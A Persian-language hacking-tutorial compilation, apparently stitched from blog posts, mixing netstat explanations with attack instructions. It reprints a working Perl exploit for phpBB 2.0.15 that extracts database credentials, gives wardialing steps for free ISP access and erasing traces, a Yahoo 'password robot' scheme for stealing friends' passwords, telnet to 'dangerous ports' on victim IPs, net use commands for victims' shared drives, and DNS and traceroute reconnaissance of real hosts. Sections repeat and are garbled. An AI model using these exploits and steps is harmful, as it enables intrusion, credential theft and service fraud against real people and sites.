شود يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباط هستيد گرفت .

دستور Netstat/? :
Help برنامه Netstat را معرفی میکند و سویچ های که ازش میتوان استفاده کرد و در مقابل هر سویچ در مورد کار آن توضیح مختصری میدهد.

دستور Netstat -n :

با این دستور میتوان آيپي و پورت سيستمي که شما با آن در ارتباط هستيد را بدست آورد .
برای مثال وقتی شما با یک نفر در یاهو مسنجر چت میکنید پورت ۵۰۵۰ روی سیستم open هست چون یاهو از پورت ۵۰۵۰ استفاده میکند پس با تایپ netstat -n خواهید داشت:
Active Connections
Proto Local Address Foreign Address State
TCP 217.219.223.21:1425 216.136.175.226:5050 TIME_WAIT
TCP 217.219.223.21:1431 64.242.248.15:80 ESTABLISHED
TCP 217.219.223.21:1437 217.219.223.38:5101 ESTABLISHED

همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 217.219.223.38 در حال چت کردن بودم که اشتراکش هم از رایان روش بوده (مثل خودم)و آي پي خود نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم Proto مشخص ميشود در قسمت Local Address من هم TCPارتباط برقرار شده است.

دستور Netstat -na :

با تايپ کردن اين دستور در MS-DOS Prompt تمام پورتهايي که داده ها و بسته ها را ميفرستند مشخص ميشود ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي مي باشد ، براي مثال من با تايپ اين فرمان در MS-DOS اين نتايج را گرفتم :

C:\WINDOWS>netstat -na
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING
TCP 217.219.223.21:1954 207.46.106.21:1863 ESTABLISHED
TCP 217.219.223.21:1971 216.136.225.36:5050 ESTABLISHED
TCP 217.219.223.21:2031 63.121.106.74:80 TIME_WAIT
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
*:* UDP 0.0.0.0:1958
*:* UDP 64.110.148.59:9
*:* UDP 64.110.148.59:137
*:* UDP 64.110.148.59:138

خب ميبينيد که پورتهاي باز روي سيستم من ليست شده است. مثل 1954-1971-2031

دستور Netstat -a :
اين دستور نيز مثل دستور Netstat -an يا -na عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميدهد ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميدهد و همچنين مانند دستور Netstat اسم صاحب سيستم را پرينت ميكند .(اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم هاي خودمان بسيار مفيد ميباشد و اگر سيستم آلوده به تروجن بود ميشود از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنند ما چگونه بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتواند خيلي به آنها کمک کند )

دستور Netstat -p xxx :
منظور از xxx يعني آن پروتکلي که شما در نظر داريد که ميتواند TCP و UDP باشد.

دستور Netstat -e :
اين دستور نيز يکي از دستورات Netstat است که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميدهد .(اين دستور بيشتر براي ويندوزهاي 98 , me و همينطور مودمهايي که آمار بسته ها را نميدهند خوب

و مفيد است چون در ويندوز 2000 – XP- قسمتي از اين آمار براحتي در اختيار User قرار ميگيرد ، و شما ميتونيد با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که در حال دانلود هستسد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتوانيد در قسمت Errors مشاهده کنيد ، ...)

دستور Netstat -r :
اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نميشود چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آي پي شما در شبکه ميدهد ، همچنين در ويندوزهاي8 9 - ME کار دستور Netstat -a را هم انجام ميدهد .

مشاهده ی صفحه ی دسکتاپ افراد در اینترنت
       برای این کار شما می توانید از برنامه ی DameWare Mini Remote .در این برنامه شما نیاز به داشتن ip   طرف برای مشاهده ی دسکتاپ دارید که قبلآ این کار را در کلاس یاهو توضیح دادیم .بعد از این اگر طرف مقابل شما از ویندوزی استفاده میکند که در بالا آمدن نیازی به پسورد ندارد کار شما راحت است و می توانید بدون هیچ مشکلی به مشاهده بپردازید و اگر این طور نبود شاید شما بتوانید با استفاده از تنظیمات برنامه این کار را انجام دهید.  دانلود برنامه

  شما توسط این اموزش میتونید به راحتی یه فروم رو هک کنید تنها کاری که لازمه اینکه در اون سایت عضو شید که خودبه خود سایت به شما یه کوکی میده وبااستفاده از همین کوکی سایت رو هک کنید

برای این کار ابتدا ببینید کوکی شما در کجا ذخیره میشه که عموما در

C:\Documents and Settings\name of your pc\Cookies

شما داره حالا میرید نو  و کوکی اون فروم وهرچی نوشته به غیر از ستاره اخرسش رو pcذخیره میشه که بسته به اسم      

copy

میکنید تابه شما کلیه اطلاعات لازم واسه هک روبده  past exploitمیکنیدحالا این کدرودر این

exploit:اینم

#!/usr/bin/perl

# *******************************

#*

#* phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability

#* This exploit gives the user all the details about the database

#* connection such as database host, username, password and

#* database name.

#*

#* Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005

#*

#* Greetings to GvR, Jumento, PP, CKrew & friends

#*

# *******************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";

print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";

print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";

print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)

{

print "Usage:\r\n";

print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";

print "SERVER - Server where PhpBB is installed.\r\n";

print "DIR - PHPBB directory or / for no directory.\r\n";

print "THREADID - Id of an existing thread.\r\n";

print "COOKIESTRING - Optional, cookie string of the http request.\r\n";

print " Use this when a thread needs authentication for viewing\r\n";

print " You can use Firefox in combination with \"Live HTTP\r\n";

print " Headers\" to get this cookiestring.\r\n\r\n";

print "Example 1 (with cookiestring):\r\n";

print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22

autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22

userid%22%3Bs%3A1%3A%222%22%3B%7D;

phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";

print "Example 2 (without cookiestring):\r\n";

print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";

exit();

}

$serv = $ARGV[0];

$dir = $ARGV[1];

$threadid = $ARGV[2];

$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;

$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";

$sploit .= $threadid;

$sploit .= "&highlight='.printf($delimit.";

$sploit .= "\$dbhost.";

$sploit .= "$delimit.";

$sploit .= "\$dbname.";

$sploit .= "$delimit.";

$sploit .= "\$dbuser.";

$sploit .= "$delimit.";

$sploit .= "\$dbpasswd.";

$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")

or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";

sleep(1);

print "[+] Sending exploit ";

print $sock "GET $sploit HTTP/1.1\r\n";

print $sock "Host: $serv\r\n";

if ( defined $cookie) {

print $sock "Cookie: $cookie \r\n";

}

print $sock "Connection: close\r\n\r\n";

$succes = 0;

while ($answer = <$sock>) {

$delimitIndex = index $answer, $delimit;

if ($delimitIndex >= 0) {

$succes = 1;

$urlIndex = index $answer, "href";

if ($urlIndex < 0){

$answer = substr($answer, length($delimit));

$length = 0;

while (length($answer) > 0) {

$nex = index($answer, $delimit);

if ($nex > 0) {

push(@array, substr($answer, 0, $nex));

$answer = substr($answer, $nex + length($delimit), length($answer));

} else {

$answer= "";

}

}

}

}

}

close($sock);

if ($succes == 1) {

print "OK\n";

sleep(1);

print "[+] Database Host: " . $array[0] . "\n";

sleep(1);

print "[+] Database Name: " . $array[1] . "\n";

sleep(1);

print "[+] Username: " . $array[2] . "\n";

sleep(1);

print "[+] Password: " . $array[3] . "\n";

sleep(1);

} else {

print "FAILED\n";

}

امید وارم استفاده مفیدی از این اموزش کرده باشید یا حق

 چه جوری می شود به صورت رایگان از یک ای اس پی به اینترنت وصل شد؟

جواب:

این بحث در مقوله ی هک کردن ای اس پی گنجانده می شود که ما برای این کار به یک برنامه به نام THC-Scan 2.0  احتیاج داریم که می توانید آن را از:

www.thc.infreno.tusculum.edu

دریافت کنید همچنین باید به سایت  http://www.networksolution.comا فته و در بالای صفحه به دنبال گزینه ی Who is بگردید و بعد از پیدا کردن آن بر روی لینک آن کلیک کنید و در بخش Domain یا در قسمت Site Name  اسم سایت مورد نظر را خود را که همان سایت ای اس پی مورد نظر خود است را بنویسید  و سپس Search کرده و در صفحه ی باز شده شماره تلفن هایی را که نمایش داده است را یادداشت کرده و به کمک نرم افزار THC-Scan 2.0 ای اس پی خود را مورد پویش قرار دهید

اگر به این شکل نتوانستید شماره تلفنی پیدا کنید می توانید به 118 تلفن کرده و از آن شماره های اداری ای اس پی خود را بگیرید و یادتان باشد که این شماره با شمار های اتصال به شبکه فرق می کند

حالا می چگونه می توانیم با نرم افزار فوق این کار را کنیم؟

بعد از اجرا کردن برنامه شماره تلفن را به آن داده  و آن شروع به سرچ می کند و پس از اتمام سرچ دوباره شماره تلفن هایی را به شما می دهد که این شماره ها همان شماره هایی هستند که می توانید با زنگ زدن به آن ها((که آموزشش را الان می دهم))به صورت رایگان به اینترنت وصل شده و یا رایگان به جایی زنگ بزنید

1.برای تلفن به خارج یا تلفن زدن رایگان به وسیله ی آن شماره تلفن ها این کارها را انجام دهید:

با تلفن معمولی یا به وسیله ی Hyper Terminal در قسمت Start-->All Programs-->Accessories-->Communication-->Hyper Terminal به آن شماره ها زنگ زده و به صورت رایگان به هر جایی تلفن بزنید

2.برای وصل شدن به اینترنت به صورت رایگان این کارها را انجام دهید:

در بخش Connection و یا همان صفحه ای که به روش Dial-up به اینترنت وصل می شوید دو قسمت Username و password  را خالی گذاشته و شماره ی پیدا شده را در قسمت Dial بنویسید و بعد به صورت رایگان به اینترنت وصل شوید

دوستان عزیز یادتان باشد حتما قبل از شروع این کار اطلاعات کاملی در مورد نحوه ی حفاطت ئ امنیت ؟آی اس پی مورد نظر خود پیدا کنید چون اگر محافظت از ای اس پی بالا باشد و شما هم مثلا به طور شانسی توانستید این کار را بکنید هنگامی که شما به آن شماره ها زنگ می زنید شماره ی شم در حافظه ی آن ای اس پی ثبت می شود و اگر آن ها شماره ی شما را پیدا کنند به راحتی می توانند علیه شما شکایت کنند البته گفتم اگر حفاظت از آن ای اس پی پایین بود می توانید یک دور کامل به ای اس پی نفوذ کرده و شماره ی خود را از حافظه ی آن پاک کنید و اگر حرفه ای هستید این کار را بکنبد و گرنه هر مشکلی که برایتان پیش آمد من هیچ مسولیتی ندارم

---

 

به دست آوردن پسورد آیدی به وسیله فریب دادن روبات یاهو

خب سلام اینم یه تر فند بره پیداکردن پس دوستانت در عرض ۱۰ دقیقه(با کد جدید).برای این کار وارد میل خود شوید و وارد کامپوز شوید در قسمت to آیدی روبات یاهو رو وارد کنید یعنی:help_pass_checker @yahoo.com از روی این لینک کپی نکید چون فاصله دادم.این آیدی روبات یاهو یا درواقع پسورد چکر سایت یاهو است.حالا با کد ۲۰۰۶ که تنها نقطه ضعف این ربات هست پسورد دوستتون رو براتون میفرسته خب پس در قسمت subject تایپ کنید password thife حالا در قسمت نامه کدزیر را کپی و در سطر اول پیست کنید.چون راست کلیک کار نمیکنه کد رو هایلایت کن از تو ادیت اون بالا کپی کن.

      20./.superfinder/ipthife.name/help_pass_checker /آیدی خودتان به اینگلیسی با ات یاهوداتکام/آیدی کسی که میخواین هک کنید/پسورد آیدی خودتان/.10minuts

خب نیازی به راهنما نیست چون در قسمت کد تیکه های مهم به فارسی توضیح داده شده است.

حالا این میل را بفرستید.فقط ۱۰ دقیقه صبر کنید.و وارد آیدی خود با مسنجر شوید.چه میبینید آف دارین از help_pass_checker درسته حالا بخونیم اهپسورد دوستمه  ایول

---

پرت ها خطرناک

 

این بار یک سری شماره ی پورت های خطرناک و پورت هایی که باعث Remote Access  به کامپیوتر قربانی می شود را می زارم این شماره پورت ها هم به درد هکرها می خورد هم افرادی که می خوان امنیت کامپیوترشان را بیشتر کنند و هم در مورد پورت های خطرناک اطلاعاتی به دست آورند چون من در هیچ وبلاگ آموزش هکی ندیدم تصمیم دارم این ها را بگذارم

خوب حالا آموزش امروز

شما می توانید فقط با یک تلنت به کامپیوتر طرف وصل شوید

مثلا می توانید اگه یک آدرس آی پی را که بیشتر مال آی اس پی ها است دارید توسط یک پورت اسکنر یا آی پی اسکنر اسکن کنید و از باز بودن این پورت ها مطلع شوید؛لازم به ذکر است اگر دیدید هیچ پورتی باز نبود ناراحت نشوید زیرا وقتی شما به آن پورت تلنت کنید معمولا باز می شود

لیست شماره ی پورت ها:

1838         1503

1850         1500

        1848  1499 

1839         1543

1840         1542

1836         1482

1433         1352

   1692         1351

1688         1172

1687         1171

1673         6129

1672         1283

6346         1268

22           1351

1573         1527

1569         1439

1562         1481

1561         1503

1543         4899

1542         5555

1507

1562

1561

خوب حالا یک مثال برای شما می زنم:

Telnet <---CMD<---Run<---Start

که به جای باید آی پی قربانی را بنویسید و به جای هم یکی از شماره پورت های بالا یا هر پورت خطرناک دیگری را که خودتان پیدا کردید بنویسید

پس به این شکل می شود:

Telnet 178.114.58.210 5555

بعد به سیستم طرف وصل شده و به پوشه ی System 32 یا محل برنامه ای که با آن پورت با اینترنت در ارتباط است می روید یعنی اگر یک برنامه با پورت 5555 کار می کند و برنامه در درایو F نصب شده باشد فکر می کنم به آن جا بروید

این هم از آموزش امروز.

منبع: فقط پرت های خطرناک( سیا هکر )

اگر share یک کامپیوتر باز باشد شما می توانید به راحتی به آن دستبرد برنید

ابتدا آیپی شخص را بدست آورید ( به وسیله روش های گفته شده )

سپس به داخل run رفته و cmd را تایپ کنید و enter کنید تا صفحه ای مانند صفحه dos باز  شود و بعد از این کار جمله ی زیر را داخل آن بنویسید تا این دفعهدرایوی از کامپیوتر شخص  قربانی برای شما باز شود :

$c\آیپی قربانی\\ :net use x

$d\آیپی قربانی\\ :net use x

$e\آیپی قربانی\\ :net use x

$f\آیپی قربانی\\ :net use x

شما می توانید قبل از $ درایو قربانی را بنویسید ( درایو ویندوز معمولا در c می باشد )

در بالا چهار نمونه مپال زده شده که کامل هستند برای استفاده از این share گرفته شده شما باید با دستورات داس آشنا باشید که می تونید آنها را با داشتن کتاب داس یا مبانی کامپیوتر به طور کامل یاد بگیرید که این دستورات اولیه آن کامل به درد شما می خورد

A vulnerability was reported in ... 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=xxxxxxxxxx
http://cgi.nessus.org/cve.php3?cve=xxxxxxxxx

BID: 1806

http://www.securityfocus.com/bid/xxxx

http://www.iss.net/security_center/search.php

http://www.cert.org/advisories/xxxxxxxxx.html

http://www.kb.cert.org/vuls/id/xxxxxx

۵- و …


- چگونه vul هايي که يه سرور داره رو پيدا کنيم؟

خوب اين موضوع کاملا بستگي به سطح اطلاعات شما داره:

۱- جوجه هکرها و هکرهاي تازه‌کار:
جوجه هکرها و نيز هکرهاي تازه کار (قابل احترام) واسه پيدا کردن vul هاي مربوط به يک سرور از security scanner ها يا vulnerability scanner ها يا Vulnerability Analysis استفاده مي‌کنند. به کمک vul scanner مي‌توان يک ip خاص رو به صورت اتوماتيک اسکن کرد تا ببينيم چه سوراخ‌هايي داره که اونا رو exploit کنيم. بعد از اسکن يک ip يک سري CVE به ما ميده که اونا رو بايد بخونيم.

۲- هکرهاي پيش‌کسوت:
هکرهاي پيش کسوت با تجربه‌اي که دارند مي‌دونند که مثلا اگه يه سرور از IIS 5.0 استفاده مي‌کنه، چه vul هايي براي اون هست پس وقتشون رو با اسکن کردن تلف نمي‌کنند. تجربه چيزي است که به‌تدريج بدست مي‌آوريد، پس زياد عجله نکنيد.

آموزش هک سایت قسمت دوم پیدا کرد یک باگ

ping ip-or-domain

Pinging sazin.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  1402ms, Average =  1043ms

Pinging 63.148.227.65 with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  881ms, Average =  861ms

Pinging 217.66.196.1 with 32 bytes of data:
 
Request timed out.
Request timed out.
Request timed out.
Request timed out.
 
Ping statistics for 217.66.196.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

tracert ip-or-domain

tracert sazin.com
tracert 63.148.227.65

Tracing route to sazin.com [63.148.227.65]
over a maximum of 30 hops:
 
  1   160 ms   160 ms   160 ms  217.218.84.3
  2   381 ms   691 ms  1772 ms  217.218.84.5
  3     *        *     2324 ms  217.218.77.1
  4   201 ms  1101 ms   180 ms  217.218.0.252
  5   341 ms   220 ms   180 ms  217.218.0.2
  6  1993 ms   180 ms   181 ms  217.218.158.41
  7   180 ms   160 ms   160 ms  195.146.63.101
  8  2824 ms     *        *     195.146.32.134
  9  1472 ms  1463 ms   871 ms  195.146.33.73
 10   791 ms   841 ms   811 ms  if-1....eglobe.net [207.45.218.161]
 11  1692 ms     *     2654 ms  if-4-....eglobe.net [207.45.222.77]
 12  1282 ms   891 ms  1052 ms  if-1-....globe.net [207.45.220.245]
 13   902 ms   931 ms   881 ms  if-15.....globe.net [66.110.8.134]
 14   931 ms   861 ms   871 ms  if-8-....leglobe.net [64.86.83.174]
 15   901 ms   841 ms   852 ms  if-5-.....globe.net [207.45.223.62]
 16   841 ms   862 ms   851 ms  pos6-.....vel3.net [209.0.227.33]
 17   841 ms   842 ms   941 ms  so-4-1.....vel3.net [209.247.10.205]
 18   882 ms   931 ms   851 ms  so-0-1....vel3.net [209.247.11.197]
 19   871 ms   891 ms   951 ms  gige9....vel3.net [209.247.11.210]
 20  1011 ms   851 ms   902 ms  unknown.Level3.net [63.208.0.94]
 21   852 ms     *      882 ms  64.156.25.74
 22   961 ms   942 ms   841 ms  63.148.227.65
 
Trace complete.

 iums.ac.ir.                    SOA    sina.i........0 345600)
 iums.ac.ir.                    NS     sina.iums.ac.ir
 iums.ac.ir.                    NS     ns1.nic.ir
 iums.ac.ir.                    MX     10   sina.iums.ac.ir
 smtp.iums.ac.ir.               A      195.146.34.181
 sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6
 sina.iums.ac.ir.               MX     10   sina.iums.ac.ir
 sina.iums.ac.ir.               A      194.225.184.20
 sina.iums.ac.ir.               A      195.146.34.181
 sun.iums.ac.ir.                CNAME  sina.iums.ac.ir
 cisco.iums.ac.ir.              CNAME  router.iums.ac.ir
 webmail.iums.ac.ir.            A      195.146.34.181
 linux.iums.ac.ir.              A      194.225.184.19
 linux.iums.ac.ir.      HINFO  Intel-Xeon/800  RedHat-Linux-7.2
 mta.iums.ac.ir.                A      195.146.34.181
 pop3.iums.ac.ir.               CNAME  sina.iums.ac.ir
 localhost.iums.ac.ir.          A      127.0.0.1
 proxy.iums.ac.ir.              CNAME  arvand.iums.ac.ir
 www.iums.ac.ir.                A      195.146.34.180
 atrak.iums.ac.ir.              A      194.225.184.14
 ns1.iums.ac.ir.                CNAME  sina.iums.ac.ir
 arvand.iums.ac.ir.             A      194.225.184.13
 router.iums.ac.ir.             A      194.225.184.1
 router.iums.ac.ir.     HINFO  Cisco3640/Access-Server  IOS-IP-12.0
 iums.ac.ir.                    SOA    sina.iu.......3456000 345600)

sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6 

Netstat هم مثل Netbios يک برنامه خدماتي هست که در خود سيستم عاملها گذاشته شده ، مثلاً در ويندوز 9x و Me در پوشه \Windows با اسم Netstat.exe قرار گرفته و در ويندوزهاي بر پايه NT مثل 2000 نيز در پوشه D:\WinNT\System32 قرار گرفته و کلاً براي نمايش تمام ارتباطات ما در شبکه و فهميدن پورتها و آيپي هاي سيستمها و ماشين هايي که ما با آنها در ارتباط هستيم بکار ميره ، براي استفاده از Netstat احتياج به هيچ برنامه کمکي و اضافي ندارين

فقط کافيه به MS-DOS Prompt برين و دستوراتي که در ادامه اين مقاله ميگم را تايپ کنيد ، ولي خب برنامه هاي زيادي براي استفاده آسان تر از Netstat آمده که احتياجي به رفتن در Ms-Dos نداره و کار کاربران اينترنت و شبکه را راحت تر کرده که يکي از بهترين برنامه ها براي اينکار X-Netstat هست که اطلاعات زيادي از ارتباطهاي شما وقتي که به شبکه وصل هستين ميده ، درست مثل برنامه Netstat.exe ولي به صورت گرافيکي و تحت ويندوز .

 اين برنامه همچنين سيستمهايي که از خارج سعي ميکنن به سيستم شما وصل بشن را هم نشان ميده و آيپي آنها را مشخص ميکنه ، درست مثل يک فايروال و همچنين پورتهاي Local و Remote و پروتکل هايي که شما با آنها ارتباط دارين را مشخص ميکنه .

 X-Netstat بر_c7ي کاربران معمولي نسخه Standard را عرضه کرده که جديدترين نسخه X-Netstat Standard ورژين 5.0 Beta هست و براي کاربران حرفه اي مثل شما نيز X-Netstat Professional را ارائه داده که جديدترين نسخه آن 4.0 هست که براي مديران شرکتها نيز مفيده ، شما ميتون_http://www.freshsw.com/files/xnsp400.exe

خب اين يکي از برنامه هاي مفيدي هست که مربوط به Netstat بود ولي حالا توضيح درباره دستورات خود Netstat :

دستور Netstat : دستور Netstat فرمان اصلي اين برنامه هست که با تايپ اين دستور شما متوجه آيپي سيستمها و پورتهايي که با آنها در ارتباط هستين بدست ميارين و همچنين مشاهده ميکنين که پورتهايي Listening و يا Established هستن و چه چيزي روي پورتهاي مختلف در حال شنيده شدن هست که خب اين باعث ميشه اگر پورتي مخصوص يک تروجن مثل 27374 که پورت اصلي Sub7 هست در سيستم شما باز بود شما متوجه اين پورت باز بروي سيستمتان بشين.

 اگر در قسمتForeign Address هم يک آيپي بوسيله آن پورت به سيستم شما وصل بود شما ميفهمين که يک نفر با آن آيپي در سيستم شماست ، پس اين يک راهي هست که متوجه بشين سيستمتان آسيب پذير هست يا نه ، براي مثال من با تايپ دستور Netstat در Ms-Dos اين نتايج را گرفتم :

C:\WINDOWS>netstat
Active Connections
Proto Local Address Foreign Address State
TCP behrooz:1454 cs33.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP behrooz:1488 63.123.44.222:80 ESTABLISHED
TCP behrooz:1491 opi1.vip.sc5.yahoo.com:80 TIME_WAIT
TCP behrooz:1497 64.187.54.23:80 ESTABLISHED
TCP behrooz:1498 64.187.54.23:80 ESTABLISHED

همانطور که ملاحظه ميکنيد اين دستور گاهي اوقات اسم صاحب سيستم کلاينتي که شما با آن در ارتباط هستين را نيز ميده و چون اينجا من با کسي در PM نبودم اسم کسي را نميبينيد ولي اگر کسي با من چت کنه و دستور Netstat را بزنه اسم بهروز را ميبينه و متوجه ميشه که اين صاحب آن سيستم کلاينتي هست که داره با آن چت ميکنه و همچنين مشخصه که من با پورت 5050 با ياهو مسنجر ارتباط برقرار کردم و همچنين نتايجي که در زير Local Address مشخص اطلاعاتي درباره خود من هست :

IP/Hostname:Port open ===> behrooz:1488

و نتايجي که در Foreign Address بدست مياد مشخص ميکنه که ما با چه سرور يا کلاينتي در ارتباطيم که در سطر دوم مثال بالا يعني 63.123.44.222:80 که آيپي سايت ياهو هست من در سايت ياهو بودم و به وسيله پورت 80 که پورت Http هست من با اين وب سرور ارتباط برقرار کردم و در قسمت Status هم مشخص ميشه که شما با چه پورتهايي Established هستين.

 يعني ارتباط برقرار کردين و وصل هستين و چه پورتهايي Listening يا منتظر Request و در حال شنيدن هستن ، بنابراين ميشه با دستور Netstat يک عمل مانيتورينگ از تمام آيپي ها - پورتها و ماشينهايي که شما با آنها در ارتباطين گرفت .

دستور Netstat -n :
همانطور که در بالا توضيح دادم ميشه با استفاده از Netstat آيپي و پورت سيستمي که شما با آن در ارتباطين را بدست آورد حتا ميشه آيپي کسي داره با شما از طريقه PM در مسنجر چت ميکنه را هم بدست آورد چون وقتي شما مسنجرها را باز ميکنيد با يک پورت خاصي شما با مسنجر ارتباط برقرار ميکنين که مثلاً شما با پورت 5050 با ياهو مسنجر ارتباط برقرار ميکنين .

 شما با استفاده از دستور Netstat -n که در MS-DOS تايپ ميکنين ميتونين آيپي طرف را بدست بيارين اگرچه من چند وقت پيش برنامه ProPort را معرفي کردم که اينکار را با قابليتهاي بيشتري انجام ميده ولي با اين دستور هم ميشه اينکار را کرد .

 اگر شما بعد از تايپ اين دستور و در نتيجه بدست آمده در قسمت Foreign Address با آيپي سيستمي بوسيله پورت 5101 ارتباط برقرار کرده بودين مطمئن باشين آن آيپي براي کسي هست که داره با شما چت ميکنه مثلاً من با تايپ دستور Netstat -n اين نتايج را گرفتم :

Active Connections
Proto Local Address Foreign Address State
TCP 207.117.93.43:1425 216.136.175.226:5050 TIME_WAIT
TCP 207.117.93.43:1431 64.242.248.15:80 ESTABLISHED
TCP 207.117.93.43:1437 213.102.29.137:5101 ESTABLISHED

همانطور که ملاحظه ميکنيد من در اين لحظه با آيپي 213.102.29.137 در حال چت کردن بودم که اشتراکش هم از البرز بوده و آيپي خود من هم در قسمت Local Address مشخص ميشه ، در قسمت Proto نيز پروتکلي که ما بوسيله آن با يک سيستم ارتباط برقرار کرديم مشخص ميشه که اينجا از طريقه پروتکل TCP هستش .

دستور Netstat/? :
شايد بهتر بود من اين دستور را قبل از 2 دستور Netstat و Netstat -n معرفي ميکردم چون اين دستور راهنما يا Help برنامه Netstat هست که با تايپ کردن آن شما يک صفحه کامل راجب فرمان Netstat ميبينين و توضيح مختصري هم در جلوي هر دستور مشاهده ميکنيد ، شما با تايپ اين دستور به اين نتايج ميرسين :

C:\WINDOWS>netstat /?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

البته ابن تمام دستورات Netstat نيست و کلاً Help کاملي نيست ولي براي کساني که ميخواهن دانش سطحي از Netstat بدست بيارن مفيد و ميتونن از اين دستور و help آن کمک بگيرن ولي من توضيح بيشتري راجب هر دستور ميدم .

دستور Netstat -na :
با تايپ کردن اين دستور در MS-DOS Prompt تمام پورتهايي که داده ها و بسته ها را ميفرستن مشخص ميشه ، نشان " na " در تمام دستورات به معني نمايش همه پورتها و ليست کردن آدرسهاي شبکه و شماره فرمها در يک قالب عددي هستش ، براي مثال من با تايپ اين فرمان در MS-DOS اين نتايج را گرفتم :

C:\WINDOWS>netstat -na

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:1954 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1971 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING
TCP 64.110.148.59:1954 207.46.106.21:1863 ESTABLISHED
TCP 64.110.148.59:1971 216.136.225.36:5050 ESTABLISHED
TCP 64.110.148.59:2031 63.121.106.74:80 TIME_WAIT
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
UDP 0.0.0.0:1958 *:*
UDP 64.110.148.59:9 *:*
UDP 64.110.148.59:137 *:*
UDP 64.110.148.59:138 *:*
UDP 127.0.0.1:1037 *:*
UDP 127.0.0.1:1074 *:*

خب ميبينيد که پورتهاي باز روي سيستم من ليست شده مثل 1854-1971-2031 ... اين دستور همان دستور Netstat -an هست که هر 2 تا يک عمل را انجام ميدن و کارشون اينه که پورتها را با معادل عدديشان نشان ميدن مثلاً پورت Netbios را با معادل عدديش يعني 139 نشان ميدن ، درست مثل دستور Netstat -n که آيپي ها را با معادل عدديشان نشان ميداد ، اين دستور پورتها را با معادل عددي نشان ميده .

دستور Netstat -a :
اين دستور نيز مثل دستور Netstat -an يا -na عمل ميکنه فقط فرقش در اينه که اين دستور پورتها را با معادل اسميشان نشان ميده ، براي مثال پورت 139 را با معادل اسميش يعني Netbios نشان ميده و همچنين مانند دستور Netstat اسم صاحب سيستم را هم نشان ميده ، مثلاً من با تايپ اين دستور در MS-DOS به اين نتايج سيدم :

C:\WINDOWS>netstat -a
